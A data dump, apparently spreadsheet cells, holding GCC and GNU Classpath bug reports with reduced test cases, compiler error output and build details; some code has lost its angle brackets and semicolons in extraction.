/home/markus/llvm/include/llvm/ADT/DenseMap.h:759:59:   required from â€˜class llvm::SmallDenseMapâ€™
/home/markus/llvm/lib/Bitcode/Writer/ValueEnumerator.h:100:39:   required from here
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:868:48: error: constructor required before non-static data member for â€˜llvm::ValueEnumerator::MDRange::Firstâ€™ has been parsed
     template
                                                ^~~~~
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:868:48: error: constructor required before non-static data member for â€˜llvm::ValueEnumerator::MDRange::Lastâ€™ has been parsed
/usr/lib/gcc/x86_64-pc-linux-gnu/6.0.0/include/g++-v6/type_traits:868:48: error: constructor required before non-static data member for â€˜llvm::ValueEnumerator::MDRange::NumStringsâ€™ has been parsed
markus@x4 llvm_build % cat BitcodeWriter.ii
template  struct integral_constant {
  static constexpr _Tp value = 0
}
template  struct conditional
template  struct A
template 
struct A : conditional::type {}
struct B : integral_constant {}
struct C {
  template 
  static integral_constant __test(int)
}
template  struct L : C { typedef decltype(__test(0)) type }
template  struct M : A&gt; {}
template  struct N : M::type {}
struct D {
  static integral_constant __test()
}
template  struct __is_implicitly_default_constructible_impl : D {
  typedef decltype(__test()) type
}
template 
struct F : __is_implicitly_default_constructible_impl::type {}
template  struct O : A F&gt; {}
template  struct G
template  struct conditional { typedef _Iftrue type }
template  struct H {
  template &lt;typename _U1 = int typename _U2 = _T2
            typename G O&gt;::value&gt;::type = true&gt;
  H()
}
template &gt; struct I {
  BucketT storage
}
struct J {
  struct K {
    int First = 0
  }
  I FunctionMDInfo
}
markus@x4 llvm_build % clang++ -std=c++11 -c BitcodeWriter.ii
markus@x4 llvm_build % icpc -wd3802 -std=c++11 -c BitcodeWriter.ii
markus@x4 llvm_build % g++ -std=c++11 -c BitcodeWriter.ii
BitcodeWriter.ii: In substitution of â€˜template static integral_constant C::__test(int) [with _Tp = J::K  = ]â€™:
BitcodeWriter.ii:13:68:   required from â€˜struct Lâ€™
BitcodeWriter.ii:7:8:   required from â€˜struct A &gt;â€™
BitcodeWriter.ii:14:32:   required from â€˜struct Mâ€™
BitcodeWriter.ii:15:32:   required from â€˜struct Nâ€™
BitcodeWriter.ii:7:8:   required from â€˜struct A F &gt;â€™
BitcodeWriter.ii:24:32:   required from â€˜struct Oâ€™
BitcodeWriter.ii:7:8:   required from â€˜struct A O &gt;â€™
BitcodeWriter.ii:29:58:   required by substitution of â€˜template O &gt;::value&gt;::type  &gt; H::H() [with _U1 = int _U2 = J::K typename G O &gt;::value&gt;::type  = ]â€™
BitcodeWriter.ii:32:65:   required from â€˜struct Iâ€™
BitcodeWriter.ii:39:8:   required from here
BitcodeWriter.ii:10:47: error: constructor required before non-static data member for â€˜J::K::Firstâ€™ has been parsed
   template 
                                               ^~~~~</t>
  </si>
  <si>
    <t>GCC-11023</t>
  </si>
  <si>
    <t>redefinition of `class __gnu_cxx::hash for hash_set</t>
  </si>
  <si>
    <t>A struct definition causes the error
f4.cc:11: error: redefinition of `class __gnu_cxx::hash'
/.../include/c++/3.3/ext/stl_hash_fun.h:71: error: previous
   definition of `class __gnu_cxx::hash'
f4.cc:23: confused by earlier errors bailing out
And moving the struct around causes the error to go away.
I *think* this is a compiler bug.  If it is an obscure feature of
C++ then the error message is very unhelpful.</t>
  </si>
  <si>
    <t>kenta</t>
  </si>
  <si>
    <t>GCC-81841</t>
  </si>
  <si>
    <t>[6 Regression] THREADPRIVATE (OpenMP) wrongly rejected in BLOCK DATA</t>
  </si>
  <si>
    <t>I believe the fix for Bug 44350 introduced an error present since. Code like:
block data
   implicit none
   integer :: int2
   real    :: flt2
   common /c_block_2/ int2 flt2
   !$OMP THREADPRIVATE(/c_block_2/)
   data int2 flt2 /2 2.2/
end block data
is rejected by gfortran (gcc version 4.9.2 (Debian 4.9.2-10)) with an error:
   !$OMP THREADPRIVATE(/c_block_2/)
                                   1
Error: !$OMP THREADPRIVATE statement is not allowed inside of BLOCK DATA at (1)
when compiled with 'gfortran -fopenmp -c'. Same error with gcc version 5.4.0 (GCC) or gcc version 6.2.0 (GCC). Looking at the latest sources of parse.c I suspect it's still failing for the latest version (hence the picked version in the bug report).
Works with gcc version 4.8.5 20150623 (Red Hat 4.8.5-11) (GCC)
See also http://forum.openmp.org/forum/viewtopic.php?f=3&amp;t=1866 and https://gcc.gnu.org/ml/fortran/2015-02/msg00086.html
I tried the suggestion in the OpenMP forum adding another exception to the check introduced into parse.c with r204185 so adding:
   case ST_OMP_THREADPRIVATE:
to
   else if (gfc_current_state () == COMP_BLOCK_DATA)
     /* Fortran 2008 C1116.  */
     switch (st)
Gfortran then obviously does compile the code and not issue the error. A simple test program seems to behave correctly and identical to ifort xlf and pgfortran. A 'patch' against the git/trunk version would be:
index 9ac50f0..1a815a9 100644
--- a/gcc/fortran/parse.c
+++ b/gcc/fortran/parse.c
@@ -36946 +36947 @@ loop:
        case ST_EQUIVALENCE:
        case ST_IMPLICIT:
        case ST_IMPLICIT_NONE:
+       case ST_OMP_THREADPRIVATE:
        case ST_PARAMETER:
        case ST_STRUCTURE_DECL:
        case ST_TYPE:
I've not extensively tested the OpenMP behaviour though only a few simple tests. I also haven't checked if more OpenMP statements should be allowed.</t>
  </si>
  <si>
    <t>dibr-bugzilla</t>
  </si>
  <si>
    <t>GCC-46772</t>
  </si>
  <si>
    <t>libquadmath: Build failure - strtod: static declaration of 'strtod'  follows non-static declaration</t>
  </si>
  <si>
    <t>Created attachment 22608
Draft patch
On MinGW there is the following compiler error cf. attachment.
/mingw/i586-pc-mingw32/sys-include -DHAVE_CONFIG_H -I. 
-I../../../gcc-trunk/libquadmath -g -O2 -MT gdtoa/dmisc.lo -MD -MP -MF 
gdtoa/.deps/dmisc.Tpo -c ../../../gcc-trunk/libquadmath/gdtoa/dmisc.c -o 
gdtoa/dmisc.o
In file included from ../../../gcc-trunk/libquadmath/gdtoa/gdtoaimp.h:186:0
                 from ../../../gcc-trunk/libquadmath/gdtoa/dmisc.c:32:
c:/MinGW/include/stdlib.h:319:1: error: static declaration of 'strtod' 
follows non-static declaration
../../../gcc-trunk/libquadmath/gdtoa/gdtoa.h:112:15: note: previous 
declaration of 'strtod' was here</t>
  </si>
  <si>
    <t>GCC-48572</t>
  </si>
  <si>
    <t>[4.7 regression] gcc.target/mips/mips-{3dps}-?.c tests ICE on IRIX 6.5</t>
  </si>
  <si>
    <t>Between 20110322 and 20110401several mips-3d-?.c and mips-ps-?.c tests started
to fail on IRIX 6.5 e.g.
Downgraded to a 'link' test due to unsupported option '-mips3d'
Downgraded to an 'assemble' test due to incompatible arch option (-march=mips3 changed to -mips64)
Executing on host: /var/gcc/regression/trunk/6.5-gcc/build/gcc/xgcc -B/var/gcc/regression/trunk/6.5-gcc/build/gcc/   -DNOMIPS16=__attribute__((nomips16)) -mips64 -mhard-float -mfp64 -mips3d -O2 -mpaired-single -c  -o mips-3d-1.o /vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.target/mips/mips-3d-1.c    (timeout = 600)
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.target/mips/mips-3d-1.c: In function 'main':
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.target/mips/mips-3d-1.c:127:1: error: unable to find a register to spill in class 'GR_REGS'
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.target/mips/mips-3d-1.c:127:1: error: this is the insn:
(insn 26 6 28 2 (set (reg:CCV2 253)
        (unspec:CCV2 [
                (reg/v:V2SF 34 $f2 [orig:197 c ] [197])
                (reg/v:V2SF 35 $f3 [orig:194 d ] [194])
                (const_int 2 [0x2])
            ] UNSPEC_C)) /vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.target/mips/mips-3d-1.c:31 677 {mips_c_cond_ps}
     (expr_list:REG_DEAD (reg/v:V2SF 34 $f2 [orig:197 c ] [197])
        (expr_list:REG_DEAD (reg/v:V2SF 35 $f3 [orig:194 d ] [194])
            (expr_list:REG_EQUAL (unspec:CCV2 [
                        (reg/v:V2SF 34 $f2 [orig:197 c ] [197])
                        (const_vector:V2SF [
                                (const_double:SF 4.6e+1 [0x0.b8p+6])
                                (const_double:SF 1.12e+2 [0x0.ep+7])
                            ])
                        (const_int 2 [0x2])
                    ] UNSPEC_C)
                (nil)))))
/vol/gcc/src/hg/trunk/local/gcc/testsuite/gcc.target/mips/mips-3d-1.c:127:1: internal compiler error: in spill_failure at reload1.c:2113
This is a regression from 4.6.</t>
  </si>
  <si>
    <t>GCC-29982</t>
  </si>
  <si>
    <t>[4.1 only] ICE in write() with gfortran 4.1.2 (and 4.2 and 4.3...)</t>
  </si>
  <si>
    <t>The following program causes an ICE with gfortran 4.1.2 running with
Ubuntu 6.10 on an i686 laptop (and works with non-gfortran compilers):
program tst
  write (6(aes15.8)) 2.0**(-0.0) = 2.0**(-0.0)
end program tst
zender@ashes:~/f$ cd ~/fgfortran -o tst tst.F90
tst.F90: In function â€˜MAIN__â€™:
tst.F90:10: internal compiler error: in expand_expr_addr_expr_1 at expr.c:6363
...
zender@ashes:~/f$ gfortran --version
GNU Fortran 95 (GCC) 4.1.2 20060928 (prerelease) (Ubuntu 4.1.1-13ubuntu5)</t>
  </si>
  <si>
    <t>zender</t>
  </si>
  <si>
    <t>GCC-46581</t>
  </si>
  <si>
    <t>[4.6 Regression] [OOP] segfault in SELECT TYPE with associate-name</t>
  </si>
  <si>
    <t>Reported by Salvatore at http://gcc.gnu.org/ml/fortran/2010-11/msg00290.html.
Reduced test case:
program bug23
  implicit none
  type :: t1
    integer allocatable :: ja(:)
  end type
  class(t1) allocatable  :: a 
  allocate(a)
  select type (aa=&gt;a)
  type is (t1)
    write(**) 'Allocation status: 'allocated(aa%ja)
  end select
end program bug23
This compiles but fails at runtime with a segfault.
It was working at r166401 (and r166825?) but fails at r166914. Possibly a regression of r166480.
Note: With 4.5 it fails at runtime with a 'double free' error after correctly printing Allocation status:  F.</t>
  </si>
  <si>
    <t>GCC-23357</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE with __alignof__ on template arguments</t>
  </si>
  <si>
    <t>Testcase:
template
struct __per_type_pool_policy
{
  static void _S_get_pool()
  {
    const static int __align = (__alignof__(_Tp) &gt;= 1 ? __alignof__(_Tp) : 1)
    static int _S_tune( 2 &gt;= __align ? 1 : __align)
  }
}
This did not ICE in 4.0.0.  Also this is reduced from PR 23352 but I was trying to reduce a different ICE 
when finding with this one.</t>
  </si>
  <si>
    <t>GCC-58150</t>
  </si>
  <si>
    <t>debug info about definition of enum class not emitted if the declaration was already used in a class</t>
  </si>
  <si>
    <t>Created attachment 30649
minimal testcase
If an enum class has a forward declaration and it is used as a class member (functions seem to be okay) the full debuginfo is not emitted when the definition appear later in the TU.
This makes debugging practically impossible.
enums are unusual in that they can be fully used even when they have just a definition.
Tested gcc versions:
g++-4.6 (Debian 4.6.4-2) 4.6.4
g++-4.7 (Debian 4.7.3-4) 4.7.3
g++-4.8 (Debian 4.8.1-8) 4.8.1
Versions before 4.6 did not implement forward declarations of enum classes so this bug is primordial.
The relevant part of the debug information looks like:
 : Abbrev Number: 3 (DW_TAG_enumeration_type)
       DW_AT_name        : (indirect string offset: 0x84): ByteCode
       DW_AT_enum_class  : 1
       DW_AT_declaration : 1
       DW_AT_byte_size   : 1
       DW_AT_decl_file   : 1
       DW_AT_decl_line   : 3
Whereas clang generates:
 : Abbrev Number: 6 (DW_TAG_enumeration_type)
       DW_AT_type        : 
       DW_AT_enum_class  : 1
       DW_AT_name        : (indirect string offset: 0x98): ByteCode
       DW_AT_byte_size   : 1
       DW_AT_decl_file   : 1
       DW_AT_decl_line   : 10</t>
  </si>
  <si>
    <t>b.r.longbons</t>
  </si>
  <si>
    <t>GCC-45530</t>
  </si>
  <si>
    <t>gfortran internal compiler error</t>
  </si>
  <si>
    <t>The example program is:
program test
implicit none
type c_struct
  type (g_struct) pointer :: g
end type
type g_struct
  type (p_struct) pointer :: p
end type
type p_struct
  type (region_struct) pointer :: r
end type
type region_struct
  type (p_struct) plot
end type
type (c_struct) curve(10)
namelist / params / curve
end program
compiling with gfortran test2.f90 hangs the compiler. I don't have a simple example but with other test programs I get the message:
[gfortran] Compiling:  test.f90 --&gt; test_DBL.o
gfortran: Internal error: Segmentation fault (program f951)
Please submit a full bug report.
See  for instructions.
In any case commenting out the namelist statement fixes the problem. Notice that this code is non-conforming since the curve variable has a pointer component but is also used in the namelist
-- David
PS: I am working on linux:
lnx4103:~/bmad/bmad_dist/test&gt; uname -a
Linux lnx4103.lns.cornell.edu 2.6.18-194.11.1.el5 #1 SMP Tue Aug 10 16:39:28 EDT  2010 x86_64 x86_64 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>david.sagan</t>
  </si>
  <si>
    <t>CLASSPATH-29047</t>
  </si>
  <si>
    <t>StackOverflowError by gnu.java.util.regex.RETokenRepeated</t>
  </si>
  <si>
    <t>I get a StackOverflowError when trying to run the test at:
http://download.oddlabs.com/elias/classpathxml.tar.gz
The test is a larger program pruned as much as possible while still demonstrating the stack overflow.
Steps to reproduce:
1. Use Classpath CVS HEAD
2. Use either JamVM 1.4.3 or the Jikes RVM from SVN
3. Run the run.sh script from the test.
I've noticed that turning off validation (the line containing factory.setValidating(true)) the test will run successfully. It seems that the validator stack depth is dependent on the number of child nodes (the  nodes in this case) which is unfortunate.</t>
  </si>
  <si>
    <t>kaz</t>
  </si>
  <si>
    <t>GCC-14047</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] __progmem__ attribute doesn't work</t>
  </si>
  <si>
    <t>It seems that this version of the GCC does ignore __progmem__ attribute.
Following code (but the same result for other vriable types) produces elf image
with rotor array placed in .data section
const uint8_t rotor[ANIMSTEPS] __attribute__((__progmem__)) = {
        ~(SEG_A)&amp;SEG_MASK ~(SEG_B)&amp;SEG_MASK ~(SEG_C)&amp;SEG_MASK
        ~(SEG_D)
Where SEG_* are simple numeric defines.
Below a fragment of the map file:
.data           0x00800060       0x2c load address 0x00000604
                0x00800060                PROVIDE (__data_start .)
 *(.data)
 .data          0x00800060       0x2b display.o
                0x00800078                rotor
(AVR)Binutils version 2.14
GCC version:
Reading specs from /usr/lib/gcc/avr/3.4.0/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-languages=c --disable-nls --target=avr
i686-redhat-linux-gnu
Thread model: single
gcc version 3.4.0 20040206 (prerelease)</t>
  </si>
  <si>
    <t>LAL</t>
  </si>
  <si>
    <t>GCC-38244</t>
  </si>
  <si>
    <t>[4.4 Regression] bitset initialization from 0 rejected.</t>
  </si>
  <si>
    <t>g++ compiled as of yesterday afternoon:
Using built-in specs.
Target: i686-linux
Configured with: ../trunk/configure --enable-languages=cc++ --build=i686-linux --host=i686-linux --target=i686-linux --prefix=/g/users/cgd/proj/gcc-trunk/bld/../inst
Thread model: posix
gcc version 4.4.0 20081123 (experimental) (GCC) 
rejects the AFAICT-valid code:
#include 
class C0 {
 public:
  C0() : b(0) { }  // FAILS.
 private:
  std::bitset b
}
class C1 {
 public:
  C1() : b(1) { }  // OK!
 private:
  std::bitset b
}
void func() {
  C0 val0
  C1 val1
}
(in particular the 'C0' initialization) with the error:
test.cc: In constructor 'C0::C0()':
test.cc:5: error: call of overloaded 'bitset(int)' is ambiguous
/g/users/cgd/proj/gcc-trunk/inst/bin/../lib/gcc/i686-linux/4.4.0/../../../../include/c++/4.4.0/bitset:808: note: candidates are: std::bitset::bitset(const char* char char) [with unsigned int _Nb = 1u]
/g/users/cgd/proj/gcc-trunk/inst/bin/../lib/gcc/i686-linux/4.4.0/../../../../include/c++/4.4.0/bitset:744: note:                 std::bitset::bitset(long unsigned int) [with unsigned int _Nb = 1u]
/g/users/cgd/proj/gcc-trunk/inst/bin/../lib/gcc/i686-linux/4.4.0/../../../../include/c++/4.4.0/bitset:652: note:                 std::bitset::bitset(const std::bitset&amp;)
I'm not completely sure what's going on here but I'm thinking it's related to the fact that the 'char*' ctor actually has two default arguments and 0 is convertible to a pointer.
This code is accepted by GCC 4.3.2 and the Comeau test drive.</t>
  </si>
  <si>
    <t>GCC-82149</t>
  </si>
  <si>
    <t>match.pd: 2919: bad if test ?</t>
  </si>
  <si>
    <t xml:space="preserve">As a result of a build with -Wlogical-op
generic-match.c:1358:77: warning: logical â€˜orâ€™ of collectively exhaustive tests is always true [-Wlogical-op]
Source code is
       bool exception_p
         = real_isnan (cst) &amp;&amp; (cst-&gt;signalling
                || (cmp != EQ_EXPR || cmp != NE_EXPR))
Maybe better code
       bool exception_p
         = real_isnan (cst) &amp;&amp; (cst-&gt;signalling
                || (cmp != EQ_EXPR </t>
  </si>
  <si>
    <t>GCC-19740</t>
  </si>
  <si>
    <t>[meta-bug] Yarrr (compile time/runtime) issues tracker with GCJ</t>
  </si>
  <si>
    <t>I'm opening this bug to track problems that affect the development of Yarrr project:
http://cvs.gnome.org/viewcvs/yarrr/
Feel free to add bugs whenever it's appropriate.</t>
  </si>
  <si>
    <t>GCC-7465</t>
  </si>
  <si>
    <t>Same function produced bad ARM code with C++ but correct one with C</t>
  </si>
  <si>
    <t xml:space="preserve">	With the same input code GCC generates wrong ARM code when used
with the C++ front-end but correct one when used with the C front-end.
Although visible with the ARM back-end it seems to be completely independent
from it and only related to the instruction scheduler.
	I have made a short investigation and it seems that the only
difference between the RTL generated by the C and the one generated by
the C++ is in the alias set computation. I have written a short program
that shows up the problem (unfortunately only visible by people familiar
with the ARM assembler).
Release:
3.1.1
Environment:
System: Linux cheetah.ri.silicomp.com 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: arm-unknown-elf
configured with: ../gnu_tools/gcc/configure --target=arm-elf --prefix=/home/paire/ecos/gcc-3.1.1+binutils-2.12.1-cross/ --with-stabs --with-gnu-as --with-gnu-ld --with-headers=/home/paire/ecos/build-at91-ecos/install/include --with-libs=/home/paire/ecos/build-at91-ecos/install/lib --enable-languages=cc++ --disable-nls
How-To-Repeat:
	The same program can be named foo.c and foo.cc (in order to activate
the two front-ends). The problem is that the obj value dereferenced to
get the next_element field has been overwritten by gs.last_element
instead of being kept from the the original h value.
------  Cut Here  ------  Cut Here  ------  Cut Here  ------  Cut Here  ------
typedef struct object
{
    struct object *next_element
} object
struct globals
{
    void *last_element
} gs
void free_obj(object *h)
void free_ptr(void *h)
{
    object *obj = *(object **)h
    *(void **)h = gs.last_element
    gs.last_element = h
    free_obj(obj-&gt;next_element) // The value of obj is incorrect with C++
}
------  Cut Here  ------  Cut Here  ------  Cut Here  ------  Cut Here  ------
when generated with the C front-end:
00000000 :
   0:   e92d4010        stmdb   sp! {r4 lr}
   4:   e59f401c        ldr     r4 [pc #28]    28 
   8:   e5903000        ldr     r3 [r0]
   c:   e1a01000        mov     r1 r0
  10:   e5942000        ldr     r2 [r4]
  14:   e5930000        ldr     r0 [r3]
  18:   e5812000        str     r2 [r1]
  1c:   e5841000        str     r1 [r4]
  20:   e8bd4010        ldmia   sp! {r4 lr}
  24:   eafffffe        b       0 
                        24: R_ARM_PC24  free_obj
  28:   00000000        andeq   r0 r0 r0
                        28: R_ARM_ABS32 gs
Notice that at offset 8 obj is kept in r3 and that at offset 14 r0
contains the right obj-&gt;next_element.
BUT when generated with the C++ front-end
00000000 :
   0:   e52de004        str     lr [sp -#4]!
   4:   e59f1014        ldr     r1 [pc #20]    20 
   8:   e5913000        ldr     r3 [r1]
   c:   e5803000        str     r3 [r0]
  10:   e5810000        str     r0 [r1]
  14:   e5930000        ldr     r0 [r3]
  18:   e49de004        ldr     lr [sp] #4
  1c:   eafffffe        b       0 
                        1c: R_ARM_PC24  _Z8free_objP6object
  20:   00000000        andeq   r0 r0 r0
                        20: R_ARM_ABS32 gs
Notice that obj is not kept but instead at line c obj is overwritten
with r3 containing gs.last_element thus leading to the bug that the
obj-&gt;next_element is in fact gs.last_element.</t>
  </si>
  <si>
    <t>eric.paire</t>
  </si>
  <si>
    <t>GCC-25546</t>
  </si>
  <si>
    <t>[3.4 Regression] Wrong-type destructor call accepted in template with no error</t>
  </si>
  <si>
    <t>Hi all. g++ 3.4.4 seems to accept calling a destructor ~T() on a char * pointer if you're inside a template in certain cases. Obviously not very serious in the grand scheme of things! Apologies if this has been fixed - I couldn't find it in the bug list though.
--- START EXAMPLE ---
class Foo {}
struct Bing
{
  char *GetChar() { return new char }
}
template struct Bar
{
  void Wibble()
  {
    bing.GetChar()-&gt;~T() // How can this be legal if T isn't char?
  }
  Bing bing 
}
int main()
{
  Bar fooBar
  fooBar.Wibble()
}
--- END EXAMPLE ---
  You can see that the (char *) return from GetChar() has ~Foo() called on it but g++ 3.4.4 happily accepts this. It doesn't actually enter the destructor for Foo - I guess it's calling the char destructor. If you split the call to GetChar into char *p = bing.GetChar() p-&gt;~T() then the compiler spots that there's something wrong:
gccbug.cpp: In member function `void Bar::Wibble() [with T = Foo]':
gccbug.cpp:21:   instantiated from here
gccbug.cpp:12: error: `*p' is not of type `Foo'
  Haven't tried it on g++ 3.4.5 or 4.0.x - I don't have time before Xmas (sorry). Command line is g++ -o gccbug gccbug.cpp g++ -v gives:
Reading specs from /space/azuro2/i686-pc-linux-gnu/toolset/lib/gcc/i686-pc-linux-gnu/3.4.4/specs
Configured with: ../gcc-3.4.4/configure --with-gnu-as --with-gnu-ld --prefix=/space/azuro2/i686-pc-linux-gn/toolset -v : (reconfigured) ../gcc-3.4.4/configure --with-gnu-as --with-gnu-ld --prefix=/space/azuro2/i686-pc-linux-gnu/toolset -v
Thread model: posix
gcc version 3.4.4
  Hope this helps. Have a good Xmas y'all regards Steev</t>
  </si>
  <si>
    <t>steev</t>
  </si>
  <si>
    <t>GCC-19396</t>
  </si>
  <si>
    <t>[3.4 regression] Invalid template in typedef accepted</t>
  </si>
  <si>
    <t>Without -pedantic the following invalid code snippet is accepted
since gcc 3.4.0:
================================
template struct A
{
    typedef int A::template X
}
================================</t>
  </si>
  <si>
    <t>GCC-50237</t>
  </si>
  <si>
    <t>[4.7 regression] bootstrap comparison failure for libcpp/lex.o</t>
  </si>
  <si>
    <t>I have had a bootstrap comparison failure for days on x86-64/Linux:
libcpp/lex.o differs
It turns out that stage3 has
  6 .init_array   00000008  0000000000000000  0000000000000000  00003d20  2**3
                  CONTENTS ALLOC LOAD RELOC DATA
but stage2 has
  6 .ctors        00000008  0000000000000000  0000000000000000  00003d20  2**3
                  CONTENTS ALLOC LOAD RELOC DATA
That isn't surprising because HAVE_INITFINI_ARRAY isn't uniform:
eric@hermes:~/build/gcc/native&gt; grep HAVE_INITFINI_ARRAY stage1-gcc/auto-host.h 
/* #undef HAVE_INITFINI_ARRAY */
eric@hermes:~/build/gcc/native&gt; grep HAVE_INITFINI_ARRAY prev-gcc/auto-host.h
#define HAVE_INITFINI_ARRAY 1
i.e. despite http://gcc.gnu.org/ml/gcc-patches/2011-06/msg00659.html the check is still applied to the host compiler not to the target.  The base compiler is the system compiler on OpenSuSE 11.0 and the check doesn't pass for it:
eric@hermes:~/build/gcc/native&gt; gcc -o t t.c
eric@hermes:~/build/gcc/native&gt; ./t
Aborted
The compiler is configured with
eric@hermes:~/build/gcc/native&gt; gcc/xgcc -v
Using built-in specs.
COLLECT_GCC=gcc/xgcc
Target: x86_64-suse-linux
Configured with: /home/eric/svn/gcc/configure x86_64-suse-linux --prefix=/home/eric/install/gcc --with-as=/home/eric/build/binutils/native/gas/as-new --with-ld=/home/eric/build/binutils/native/ld/ld-new --enable-languages=cc++objcobj-c++javafortranada --enable-checking=yesrtl --enable-__cxa_atexit --disable-nls --disable-libmudflap
Thread model: posix
gcc version 4.7.0 20110830 (experimental) [trunk revision 178287] (GCC)
A workaround would be to get rid of the __attribute__((constructor)) in lex.c but someone should sit down and write a correct HAVE_INITFINI_ARRAY check.</t>
  </si>
  <si>
    <t>GCC-18878</t>
  </si>
  <si>
    <t>[4.0 only] erronous error message on vaild USE statement</t>
  </si>
  <si>
    <t>gfortran issues an error and exits if a program contains
a USE statement of the form
USE MOD_NAME ONLY : A =&gt; B C =&gt; B
Apparently gfortran does not like the multiple use of the B
symbol.</t>
  </si>
  <si>
    <t>GCC-65523</t>
  </si>
  <si>
    <t>ICE: in gimple_op at gimple.h:2270 with -fcheck-pointer-bounds -mmpx</t>
  </si>
  <si>
    <t>Created attachment 35107
reduced testcase (gcc.dg/torture/pr55890-3.c)
Compiler output:
$ gcc -fcheck-pointer-bounds -mmpx testcase.c
testcase.c: In function 'bar.chkp':
testcase.c:7:1: internal compiler error: in gimple_op at gimple.h:2270
 }
 ^
0x59ec53 gimple_op
        /mnt/svn/gcc-trunk/gcc/gimple.h:2270
0xcfb51f gimple_op
        /mnt/svn/gcc-trunk/gcc/gimple.h:2257
0xcfb51f gimple_call_arg
        /mnt/svn/gcc-trunk/gcc/gimple.h:2855
0xd012cf chkp_build_returned_bound
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:2195
0xd012cf chkp_get_bounds_by_definition
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:2728
0xd012cf chkp_find_bounds_1
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:3475
0xd04862 chkp_find_bounds
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:3555
0xd04862 chkp_add_bounds_to_ret_stmt
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:1232
0xd04862 chkp_instrument_function
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:4133
0xd04862 chkp_execute
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:4323
0xd04862 execute
        /mnt/svn/gcc-trunk/gcc/tree-chkp.c:4380
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                                     
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-221530-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/5.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-221530-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 5.0.0 20150320 (experimental) (GCC) 
Tested revisions:
r221539 - ICE</t>
  </si>
  <si>
    <t>GCC-77320</t>
  </si>
  <si>
    <t>ICE: get_ubsan_type_info_for_type at ubsan.c:305</t>
  </si>
  <si>
    <t>GCC-6.1.0
x86_64-pc-linux-gnu and x86_64-apple-darwin15.4.0
Running the following test:
make -s -C gcc check-gcc RUNTESTFLAGS=dg-torture.exp=pr48953.c --target_board=unix/-fsanitize=undefined/
GCC throw an ICE:
------------------------------------------------------------------------
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'foo':
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:5:19: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'foo':
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:5:19: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: gcc.dg/torture/pr48953.c   -O0  (internal compiler error)
FAIL: gcc.dg/torture/pr48953.c   -O0  (test for excess errors)
Excess errors:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:5:19: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
UNRESOLVED: gcc.dg/torture/pr48953.c   -O0  compilation failed to produce executable
Executing on host: /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -B/Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/ /Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c  -fno-diagnostics-show-caret -fdiagnostics-color=never    -O1  -fno-tree-dce  -lm   -fsanitize=undefined  -o ./pr48953.exe    (timeout = 300)
spawn /Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/xgcc -B/Users/sabrinasouto/workspace/gcc-6.x/objdir/gcc/ /Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c -fno-diagnostics-show-caret -fdiagnostics-color=never -O1 -fno-tree-dce -lm -fsanitize=undefined -o ./pr48953.exe
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'main':
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c:15:5: internal compiler error: in get_ubsan_type_info_for_type at ubsan.c:305
libbacktrace could not find executable to open
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/Users/sabrinasouto/workspace/gcc-6.x/gcc-6.1.0/gcc/testsuite/gcc.dg/torture/pr48953.c: In function 'main':
